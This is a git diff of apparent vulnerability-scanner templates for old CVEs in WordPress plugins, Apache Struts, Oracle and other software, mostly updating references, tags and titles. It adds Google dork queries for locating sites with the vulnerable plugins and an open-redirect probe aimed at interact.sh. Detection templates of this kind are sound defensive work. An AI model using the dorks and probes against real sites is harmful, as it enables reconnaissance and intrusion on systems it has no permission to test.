diff --git a/cves/2011/CVE-2011-5181.yaml b/cves/2011/CVE-2011-5181.yaml
index c277e63600..91e39c5c91 100644
--- a/cves/2011/CVE-2011-5181.yaml
+++ b/cves/2011/CVE-2011-5181.yaml
@@ -1,14 +1,18 @@
 id: CVE-2011-5181
 
 info:
-  name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
+  name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+    - http://web.archive.org/web/20210123155244/https://www.securityfocus.com/bid/50778/
+    - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/
   classification:
     cve-id: CVE-2011-5181
+  metadata:
+    google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2011/CVE-2011-5265.yaml b/cves/2011/CVE-2011-5265.yaml
index 538032943f..f3b3a24e05 100644
--- a/cves/2011/CVE-2011-5265.yaml
+++ b/cves/2011/CVE-2011-5265.yaml
@@ -1,14 +1,18 @@
 id: CVE-2011-5265
 
 info:
-  name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
+  name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-5265
+    - http://web.archive.org/web/20210123103000/https://www.securityfocus.com/bid/50779/
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71468
   classification:
     cve-id: CVE-2011-5265
+  metadata:
+    google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
   tags: cve,cve2011,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml
index 44ad07aa43..4058bcdd5b 100644
--- a/cves/2012/CVE-2012-0392.yaml
+++ b/cves/2012/CVE-2012-0392.yaml
@@ -7,10 +7,13 @@ info:
   description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
   reference:
     - https://cwiki.apache.org/confluence/display/WW/S2-008 https://blog.csdn.net/weixin_43416469/article/details/113850545
+    - http://www.exploit-db.com/exploits/18329
+    - https://lists.immunityinc.com/pipermail/dailydave/2012-January/000011.html
+    - http://web.archive.org/web/20150110183326/http://secunia.com:80/advisories/47393
+  remediation: Developers should immediately upgrade to at least Struts 2.3.18.
   classification:
     cve-id: CVE-2012-0392
-  remediation: Developers should immediately upgrade to at least Struts 2.3.18.
-  tags: cve,cve2012,apache,rce,struts,java
+  tags: cve2012,apache,rce,struts,java,edb,cve
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-0896.yaml b/cves/2012/CVE-2012-0896.yaml
index f6478d409d..77982c182d 100644
--- a/cves/2012/CVE-2012-0896.yaml
+++ b/cves/2012/CVE-2012-0896.yaml
@@ -7,10 +7,14 @@ info:
   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
   reference:
     - https://packetstormsecurity.com/files/108631/
-    - https://www.cvedetails.com/cve/CVE-2012-0896
+    - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
+    - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+    - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
   classification:
     cve-id: CVE-2012-0896
-  tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
+  metadata:
+    google-query: inurl:"/wp-content/plugins/count-per-day"
+  tags: packetstorm,cve,cve2012,lfi,wordpress,wp-plugin,traversal
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-0901.yaml b/cves/2012/CVE-2012-0901.yaml
index 0e96e46920..a8ca09950e 100644
--- a/cves/2012/CVE-2012-0901.yaml
+++ b/cves/2012/CVE-2012-0901.yaml
@@ -1,15 +1,19 @@
 id: CVE-2012-0901
 
 info:
-  name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
+  name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-0901
+    - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271
   classification:
     cve-id: CVE-2012-0901
-  tags: cve,cve2012,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
+  tags: wp-plugin,packetstorm,cve,cve2012,wordpress,xss
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-0981.yaml b/cves/2012/CVE-2012-0981.yaml
index eed1d3fafd..abd78bb082 100644
--- a/cves/2012/CVE-2012-0981.yaml
+++ b/cves/2012/CVE-2012-0981.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/18435
     - https://www.cvedetails.com/cve/CVE-2012-0981
+    - http://web.archive.org/web/20151016200610/http://secunia.com/advisories/47802/
+    - http://www.exploit-db.com/exploits/18435
   classification:
     cve-id: CVE-2012-0981
-  tags: cve,cve2012,lfi,phpshowtime
+  tags: phpshowtime,edb,cve,cve2012,lfi
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-0991.yaml b/cves/2012/CVE-2012-0991.yaml
index 1564e8e689..3d6345a868 100644
--- a/cves/2012/CVE-2012-0991.yaml
+++ b/cves/2012/CVE-2012-0991.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/36650
     - https://www.cvedetails.com/cve/CVE-2012-0991
+    - http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/
+    - http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
   classification:
     cve-id: CVE-2012-0991
-  tags: cve,cve2012,lfi,openemr,traversal
+  tags: lfi,openemr,traversal,edb,cve,cve2012
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-0996.yaml b/cves/2012/CVE-2012-0996.yaml
index be246dfabe..50bf5aa1a6 100644
--- a/cves/2012/CVE-2012-0996.yaml
+++ b/cves/2012/CVE-2012-0996.yaml
@@ -8,10 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/36784
     - https://www.cvedetails.com/cve/CVE-2012-0996
+    - https://www.htbridge.ch/advisory/HTB23071
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2012-0996
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2012,lfi
+  tags: cve,cve2012,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-1226.yaml b/cves/2012/CVE-2012-1226.yaml
index a8174b8cb1..b0edd8260f 100644
--- a/cves/2012/CVE-2012-1226.yaml
+++ b/cves/2012/CVE-2012-1226.yaml
@@ -8,10 +8,12 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/36873
     - https://www.cvedetails.com/cve/CVE-2012-1226
+    - http://web.archive.org/web/20210508221434/https://www.securityfocus.com/archive/1/521583
+    - http://www.vulnerability-lab.com/get_content.php?id=428
+  remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2012-1226
-  remediation: Upgrade to a supported version.
-  tags: cve,cve2012,lfi,dolibarr,traversal
+  tags: cve,cve2012,lfi,dolibarr,traversal,edb
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml
index 52c1f5a03a..0e4bcec9e2 100644
--- a/cves/2012/CVE-2012-1823.yaml
+++ b/cves/2012/CVE-2012-1823.yaml
@@ -9,9 +9,11 @@ info:
   reference:
     - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
     - https://nvd.nist.gov/vuln/detail/CVE-2012-1823
+    - https://bugs.php.net/bug.php?id=61910
+    - http://www.php.net/ChangeLog-5.php#5.4.2
   classification:
     cve-id: CVE-2012-1823
-  tags: rce,php,cve,cve2012
+  tags: cve2012,kev,vulhub,rce,php,cve
 
 requests:
   - raw:
diff --git a/cves/2012/CVE-2012-1835.yaml b/cves/2012/CVE-2012-1835.yaml
index f7318bb8d6..dd6dc50478 100644
--- a/cves/2012/CVE-2012-1835.yaml
+++ b/cves/2012/CVE-2012-1835.yaml
@@ -1,16 +1,19 @@
 id: CVE-2012-1835
 
 info:
-  name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
+  name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter
-    to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg
-    parameter to /app/view/save_successful.php.
+  description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+    - https://web.archive.org/web/20151001133311/http://archives.neohapsis.com/archives/bugtraq/2012-04/0071.html
+    - http://web.archive.org/web/20210615141436/https://www.securityfocus.com/bid/52986
+    - https://www.htbridge.com/advisory/HTB23082
   classification:
     cve-id: CVE-2012-1835
+  metadata:
+    google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
   tags: cve,cve2012,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2012/CVE-2012-2371.yaml b/cves/2012/CVE-2012-2371.yaml
index 7c3e948821..5cf4afa804 100644
--- a/cves/2012/CVE-2012-2371.yaml
+++ b/cves/2012/CVE-2012-2371.yaml
@@ -1,15 +1,18 @@
 id: CVE-2012-2371
 
 info:
-  name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
+  name: WP-FaceThumb 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-2371
+    - http://web.archive.org/web/20140805090129/http://secunia.com/advisories/49143/
+    - http://www.openwall.com/lists/oss-security/2012/05/15/12
+    - http://packetstormsecurity.org/files/112658/WordPress-WP-FaceThumb-Gallery-0.1-Cross-Site-Scripting.html
   classification:
     cve-id: CVE-2012-2371
-  tags: cve,cve2012,wordpress,xss,wp-plugin
+  tags: packetstorm,cve,cve2012,wordpress,xss,wp-plugin
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-3153.yaml b/cves/2012/CVE-2012-3153.yaml
index e28f47c522..1e32c940bf 100644
--- a/cves/2012/CVE-2012-3153.yaml
+++ b/cves/2012/CVE-2012-3153.yaml
@@ -12,9 +12,10 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-3152
     - https://www.exploit-db.com/exploits/31737
     - https://www.oracle.com/security-alerts/cpuoct2012.html
+    - http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
   classification:
     cve-id: CVE-2012-3153
-  tags: cve,cve2012,oracle,rce
+  tags: cve,cve2012,oracle,rce,edb
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4242.yaml b/cves/2012/CVE-2012-4242.yaml
index 43bc9b456a..75a75271c1 100644
--- a/cves/2012/CVE-2012-4242.yaml
+++ b/cves/2012/CVE-2012-4242.yaml
@@ -1,12 +1,14 @@
 id: CVE-2012-4242
 
 info:
-  name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
+  name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4242
+    - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html
+    - http://web.archive.org/web/20210121230717/https://www.securityfocus.com/bid/55622/
   classification:
     cve-id: CVE-2012-4242
   tags: cve,cve2012,wordpress,xss,wp-plugin
diff --git a/cves/2012/CVE-2012-4253.yaml b/cves/2012/CVE-2012-4253.yaml
index b085d1ae97..c2b2313f25 100644
--- a/cves/2012/CVE-2012-4253.yaml
+++ b/cves/2012/CVE-2012-4253.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/37129
     - https://www.cvedetails.com/cve/CVE-2012-4253
+    - http://packetstormsecurity.org/files/112304/MySQLDumper-1.24.4-LFI-XSS-CSRF-Code-Execution-Traversal.html
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/75286
   classification:
     cve-id: CVE-2012-4253
-  tags: cve,cve2012,lfi
+  tags: packetstorm,cve,cve2012,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4273.yaml b/cves/2012/CVE-2012-4273.yaml
index 2cbe9c386a..8143853716 100644
--- a/cves/2012/CVE-2012-4273.yaml
+++ b/cves/2012/CVE-2012-4273.yaml
@@ -1,15 +1,20 @@
 id: CVE-2012-4273
 
 info:
-  name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
+  name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4273
+    - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798
+    - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/
+    - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html
   classification:
     cve-id: CVE-2012-4273
-  tags: cve,cve2012,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
+  tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4547.yaml b/cves/2012/CVE-2012-4547.yaml
index ff59b1ea3f..d156aed493 100644
--- a/cves/2012/CVE-2012-4547.yaml
+++ b/cves/2012/CVE-2012-4547.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/36164
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4547
+    - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+    - http://openwall.com/lists/oss-security/2012/10/29/7
   classification:
     cve-id: CVE-2012-4547
-  tags: cve,cve2020,xss,awstats
+  tags: cve,cve2012,xss,awstats,edb
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4768.yaml b/cves/2012/CVE-2012-4768.yaml
index 899cdd00eb..0e320533e6 100644
--- a/cves/2012/CVE-2012-4768.yaml
+++ b/cves/2012/CVE-2012-4768.yaml
@@ -1,15 +1,17 @@
 id: CVE-2012-4768
 
 info:
-  name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4768
+    - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt
+    - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
   classification:
     cve-id: CVE-2012-4768
-  tags: cve,cve2012,wordpress,xss,wp-plugin
+  tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4878.yaml b/cves/2012/CVE-2012-4878.yaml
index 341d0052d1..b4dcf437f8 100644
--- a/cves/2012/CVE-2012-4878.yaml
+++ b/cves/2012/CVE-2012-4878.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/37034
     - https://www.cvedetails.com/cve/CVE-2012-4878
+    - http://www.vulnerability-lab.com/get_content.php?id=487
+    - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html
   classification:
     cve-id: CVE-2012-4878
-  tags: cve,cve2012,lfi,traversal
+  tags: cve2012,lfi,traversal,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4889.yaml b/cves/2012/CVE-2012-4889.yaml
index 529af08dce..2162408cda 100644
--- a/cves/2012/CVE-2012-4889.yaml
+++ b/cves/2012/CVE-2012-4889.yaml
@@ -1,16 +1,18 @@
 id: CVE-2012-4889
 
 info:
-  name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
+  name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
   reference:
-    - https://www.securityfocus.com/bid/52841/info
+    - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4889
+    - http://packetstormsecurity.org/files/111474/VL-437.txt
+    - http://www.vulnerability-lab.com/get_content.php?id=437
   classification:
     cve-id: CVE-2012-4889
-  tags: cve,cve2012,xss,manageengine
+  tags: cve,cve2012,xss,manageengine,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
index 419d1fad47..2b05afdf8a 100644
--- a/cves/2012/CVE-2012-4940.yaml
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -8,9 +8,11 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/37996
     - https://nvd.nist.gov/vuln/detail/CVE-2012-4940
+    - http://www.kb.cert.org/vuls/id/586556
+    - http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/
   classification:
     cve-id: CVE-2012-4940
-  tags: cve,cve2012,axigen,lfi,mail
+  tags: edb,cve,cve2012,axigen,lfi,mail
 
 requests:
   - method: GET
diff --git a/cves/2012/CVE-2012-5913.yaml b/cves/2012/CVE-2012-5913.yaml
index 440c59b114..d4fe46fa32 100644
--- a/cves/2012/CVE-2012-5913.yaml
+++ b/cves/2012/CVE-2012-5913.yaml
@@ -1,16 +1,18 @@
 id: CVE-2012-5913
 
 info:
-  name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
+  name: WordPress Integrator 1.32 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2012-5913
     - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/
+    - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html
+    - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt
   classification:
     cve-id: CVE-2012-5913
-  tags: cve,cve2012,wordpress,xss,wp-plugin
+  tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-1965.yaml b/cves/2013/CVE-2013-1965.yaml
index e682fde510..a487bd900a 100644
--- a/cves/2013/CVE-2013-1965.yaml
+++ b/cves/2013/CVE-2013-1965.yaml
@@ -8,9 +8,10 @@ info:
   reference:
     - http://struts.apache.org/development/2.x/docs/s2-012.html
     - https://nvd.nist.gov/vuln/detail/CVE-2013-1965
+    - https://bugzilla.redhat.com/show_bug.cgi?id=967655
+  remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
   classification:
     cve-id: CVE-2013-1965
-  remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.
   tags: cve,cve2013,apache,rce,struts,ognl
 
 requests:
diff --git a/cves/2013/CVE-2013-2248.yaml b/cves/2013/CVE-2013-2248.yaml
index 94f2efcab6..49e8789f61 100644
--- a/cves/2013/CVE-2013-2248.yaml
+++ b/cves/2013/CVE-2013-2248.yaml
@@ -9,20 +9,21 @@ info:
     - https://www.exploit-db.com/exploits/38666
     - https://nvd.nist.gov/vuln/detail/CVE-2013-2248
     - https://cwiki.apache.org/confluence/display/WW/S2-017
+    - http://struts.apache.org/release/2.3.x/docs/s2-017.html
+  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
   classification:
     cve-id: CVE-2013-2248
-  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
-  tags: cve,cve2013,apache,redirect,struts
+  tags: cve,cve2013,apache,redirect,struts,edb
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.action?redirect:http://www.example.com/"
+      - "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
 
 # Enhanced by mp on 2022/02/21
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index 4e89d8d270..c310535f2c 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -9,10 +9,10 @@ info:
     - http://struts.apache.org/release/2.3.x/docs/s2-016.html
     - https://cwiki.apache.org/confluence/display/WW/S2-016
     - https://nvd.nist.gov/vuln/detail/CVE-2013-2251
+  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
   classification:
     cve-id: CVE-2013-2251
-  remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.
-  tags: cve,cve2013,rce,struts,apache,ognl
+  tags: cve,cve2013,rce,struts,apache,ognl,kev
 
 requests:
   - raw:
diff --git a/cves/2013/CVE-2013-2287.yaml b/cves/2013/CVE-2013-2287.yaml
index fc159e010f..bb925ae363 100644
--- a/cves/2013/CVE-2013-2287.yaml
+++ b/cves/2013/CVE-2013-2287.yaml
@@ -1,14 +1,17 @@
 id: CVE-2013-2287
 
 info:
-  name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting  vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-2287
+    - https://www.dognaedis.com/vulns/DGS-SEC-16.html
   classification:
     cve-id: CVE-2013-2287
+  metadata:
+    google-query: inurl:"/wp-content/plugins/uploader"
   tags: cve,cve2013,wordpress,xss,wp-plugin
 
 requests:
diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml
index 0448bfb7f8..3e3a9b5aa2 100644
--- a/cves/2013/CVE-2013-3526.yaml
+++ b/cves/2013/CVE-2013-3526.yaml
@@ -1,15 +1,19 @@
 id: CVE-2013-3526
 
 info:
-  name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
+  name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+    - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
+    - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/
   classification:
     cve-id: CVE-2013-3526
-  tags: cve,cve2013,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/trafficanalyzer"
+  tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-3827.yaml b/cves/2013/CVE-2013-3827.yaml
index 03525d58c2..055959122f 100644
--- a/cves/2013/CVE-2013-3827.yaml
+++ b/cves/2013/CVE-2013-3827.yaml
@@ -4,16 +4,15 @@ info:
   name: Javafaces LFI
   author: Random-Robbie
   severity: medium
-  description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0,
-    and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web
-    Container.
+  description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-3827
     - https://www.exploit-db.com/exploits/38802
     - https://www.oracle.com/security-alerts/cpuoct2013.html
+    - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
   classification:
     cve-id: CVE-2013-3827
-  tags: cve,cve2013,lfi,javafaces,oracle
+  tags: edb,cve,cve2013,lfi,javafaces,oracle
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-4117.yaml b/cves/2013/CVE-2013-4117.yaml
index 85e072ed31..1d687a148e 100644
--- a/cves/2013/CVE-2013-4117.yaml
+++ b/cves/2013/CVE-2013-4117.yaml
@@ -1,15 +1,19 @@
 id: CVE-2013-4117
 
 info:
-  name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-4117
+    - http://openwall.com/lists/oss-security/2013/07/11/11
+    - http://seclists.org/bugtraq/2013/Jul/17
   classification:
     cve-id: CVE-2013-4117
-  tags: cve,cve2013,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
+  tags: cve2013,wordpress,xss,wp-plugin,seclists,cve
 
 requests:
   - method: GET
diff --git a/cves/2013/CVE-2013-4625.yaml b/cves/2013/CVE-2013-4625.yaml
index 9cc9de7e45..db3dc3261f 100644
--- a/cves/2013/CVE-2013-4625.yaml
+++ b/cves/2013/CVE-2013-4625.yaml
@@ -1,17 +1,21 @@
 id: CVE-2013-4625
 
 info:
-  name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-4625
     - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html
+    - https://seclists.org/bugtraq/2013/Jul/160
+    - https://www.htbridge.com/advisory/HTB23162
+  remediation: Upgrade to Duplicator 0.4.5 or later.
   classification:
     cve-id: CVE-2013-4625
-  remediation: Upgrade to Duplicator 0.4.5 or later.
-  tags: cve,cve2013,wordpress,xss,wp-plugin
+  metadata:
+    google-query: inurl:"/wp-content/plugins/duplicator"
+  tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm
 
 requests:
   - method: GET
